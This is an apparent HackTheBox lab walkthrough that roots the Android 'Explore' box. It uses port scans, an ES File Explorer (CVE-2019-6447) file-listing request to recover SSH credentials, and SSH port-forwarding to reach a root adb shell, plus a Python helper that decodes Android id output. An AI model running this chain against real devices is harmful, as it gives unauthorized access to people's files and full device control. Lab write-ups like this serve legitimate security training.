
HackTheBox Walkthrough - Explore


🛡️Types of OS : Android

🌞Released on : 26th June 2021

☢️Difficulty : Easy

👍Point: 20

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- $IP -oN Explore.nmap

[image: nmap scan report]

💉Running the nmap scan gives four ports

port 2222 — ssh

port 59777 — http

port 5555 — adb shell {the service behind this port can be identified by looking it up on Google}

[image: adb shell port]

ffuf -u http://explore.htb:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c

[image: ffuf scan]

😃Let's visit the web page

😜As you can see it's showing Forbidden. So let's try some other directory.

😃And we get the same result. Let's look into port 59777 and find out which service uses it on Android.

☺️We find this article from The Daily Swig which explains the vulnerability in ES File Explorer: it exposes user data on an open port, so anyone on the same network can read it.

😏Let's try running FFUF on http://explore.htb:59777/sdcard/

[image: ffuf sdcard]

😏Looks like we found our first flag. So easy.

😁The PoC for the above vulnerability can be found on this link

👍Going through the PoC I found that we can execute commands.

😌Looking at the above picture we can find some basic commands, so let's try them.

curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://explore.htb:59777/sdcard/DCIM


🤔Let's check creds.jpg

[image: ssh creds]

😊Here we found creds for SSH. Now let's SSH into the box.

ssh kristi@explore.htb -p 2222

Password authentication

Password:

:/ $ id

uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
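The id line above already tells us what kind of account this SSH login is. As an added example (not part of the original walkthrough), this Python decodes an Android id line using the uid layout from Android's android_filesystem_config.h (constants assumed unchanged across releases): uid 10076 is app index 76 of Android user 0, hence the name u0_a76, the per-app groups 20076 and 50076 follow from the same index, and the untrusted_app SELinux domain confirms an ordinary app sandbox rather than the shell or root domain.

```python
import re

# Ranges from android_filesystem_config.h (assumed stable across Android releases).
AID_USER_OFFSET = 100000       # each Android user (profile) owns a block of 100000 uids
AID_APP_START, AID_APP_END = 10000, 19999   # uids handed to installed (non-system) apps
AID_CACHE_GID_START = 20000    # per-app cache group, named <app>_cache
AID_SHARED_GID_START = 50000   # per-app group shared across users, named all_a<n>

# Constructed sample: the `id` output from the kristi session in this walkthrough.
SAMPLE_ID_LINE = (
    "uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),"
    "9997(everybody),20076(u0_a76_cache),50076(all_a76) "
    "context=u:r:untrusted_app:s0:c76,c256,c512,c768"
)


def parse_id_line(line):
    """Split an Android `id` line into uid, gid, (gid, name) groups and SELinux context."""
    uid = int(re.search(r"uid=(\d+)", line).group(1))
    gid = int(re.search(r"gid=(\d+)", line).group(1))
    group_field = re.search(r"groups=(\S+)", line).group(1)
    groups = [(int(n), name) for n, name in re.findall(r"(\d+)\(([^)]+)\)", group_field)]
    ctx = re.search(r"context=(\S+)", line)
    return {"uid": uid, "gid": gid, "groups": groups, "context": ctx.group(1) if ctx else None}


def decode_app_uid(uid):
    """Map a uid to (android_user, app_index, name) the way Android names app accounts."""
    user, appid = divmod(uid, AID_USER_OFFSET)
    if not AID_APP_START <= appid <= AID_APP_END:
        return None  # system account or isolated process, not a regular app uid
    app_index = appid - AID_APP_START
    return user, app_index, f"u{user}_a{app_index}"


def assess(line):
    """Summarise what an `id` line says about the privilege of the shell on the device."""
    info = parse_id_line(line)
    decoded = decode_app_uid(info["uid"])
    domain = info["context"].split(":")[2] if info["context"] else None
    gids = {g for g, _ in info["groups"]}
    per_app_ok = decoded is not None and {
        AID_CACHE_GID_START + decoded[1], AID_SHARED_GID_START + decoded[1]} <= gids
    return {
        "name": decoded[2] if decoded else None,
        "user": decoded[0] if decoded else None,
        "domain": domain,
        "app_sandbox": decoded is not None and domain == "untrusted_app",
        "per_app_groups_consistent": per_app_ok,
        "has_inet": any(name == "inet" for _, name in info["groups"]),
    }
```

An app-sandbox result means the account is confined like any installed app: no package installation, no access to other apps' data, which is why the walkthrough turns to the adb listener instead.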

😃I checked whether the user has execution rights, but it does not. So basically we cannot install anything to get root. But port 5555 is open and running an adb shell. I tried to access it from my Kali machine but I couldn't.

[image: open ports]

😶As we can see 5555 is listening, so let's port forward it through SSH and connect to it from our own box.

ssh -L 5555:127.0.0.1:5555 kristi@explore.htb -p 2222

adb connect localhost:5555

connected to localhost:5555

adb shell

error: more than one device/emulator

😊Run adb shell to get a shell; if it shows the error above, list the connected devices with adb devices

🥳As you can see there are two devices connected. Therefore let's connect to a specific device with the command adb -s localhost:5555 shell. Instructions for this command can be found here

💖And we get root on connecting through adb shell.

🥳The root flag can be found in data directory.

............Rooted...........

💖Summary of knowledge

💉ES File Explorer Security Vulnerability CVE-2019-6447

🛡️SSH port forwarding to get root
